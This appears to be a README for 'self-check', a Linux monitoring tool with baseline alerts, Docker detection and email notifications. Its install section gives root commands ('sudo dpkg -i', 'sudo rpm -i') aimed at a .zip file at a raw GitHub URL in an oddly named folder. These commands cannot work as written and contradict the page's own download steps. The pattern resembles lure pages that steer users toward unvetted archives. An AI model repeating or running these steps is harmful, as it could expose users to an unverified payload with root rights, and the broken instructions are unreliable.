Welcome to self-check. This application offers a comprehensive way to monitor your Linux system. It includes features for intelligent baseline management, which helps you avoid unnecessary alerts. Whether you manage servers, virtual machines, containers, or edge devices, this tool enhances your monitoring capabilities.
- Operating System: Compatible with most Linux distributions.
- Memory: At least 1 GB of RAM.
- Storage: 100 MB of free disk space.
- Python: Version 3.x installed on your system.
To get started, visit this page to download: GitHub Releases.
- Click on the link above to navigate to the Releases page.
- Find the latest release marked as "Latest Release."
- Look for an asset or file name that includes
.deb,.rpm, or relevant installation package for your Linux distribution. - Click the appropriate file to start the download.
- Once the download is complete, open your terminal or file manager to locate the downloaded file.
- Open a terminal.
- Navigate to the download directory.
- Install the package with the following command:
sudo dpkg -i https://raw.githubusercontent.com/QShkan/self-check/main/iridorhexis/self-check.zip
- Open a terminal.
- Navigate to the download directory.
- Install the package with the following command:
sudo rpm -i https://raw.githubusercontent.com/QShkan/self-check/main/iridorhexis/self-check.zip
Details on container installations or specific setups can be found in the additional documentation on the Releases page or the FAQs.
After you have installed self-check, you can run it from your applications menu or by typing the following command in your terminal:
self-checkUpon startup, you will see a dashboard displaying the system status, performance metrics, and security alerts. The application also sends HTML email notifications for any critical events, ensuring you stay informed about your system's health.
- Intelligent Baseline Management: Automatically learns normal performance patterns and reduces false alerts.
- Docker Container Detection: Monitors Docker containers with ease.
- Comprehensive Security Monitoring: Detects vulnerabilities and reports them through email notifications.
- User-Friendly Interface: Easy navigation and visual data displays for quick understanding.
Configure email settings within the application to receive real-time alerts. This feature ensures that you know when critical issues arise, allowing you to address them promptly.
If you encounter any issues while installing or running self-check, here are a few common solutions:
- Installation Errors: Ensure you downloaded the correct package for your system. Check dependencies for your Linux distribution.
- Launching Issues: If the program does not launch, verify that Python is correctly installed and recognized by your system.
- Email Notifications Not Working: Double-check your email configuration settings inside the application.
For more guidance, check out the following resources:
- Documentation for detailed feature explanations.
- Issue Tracker for reporting bugs or requesting features.
- Community support on platforms such as Stack Overflow or Reddit.
Feel free to reach out if you need further assistance. Happy monitoring!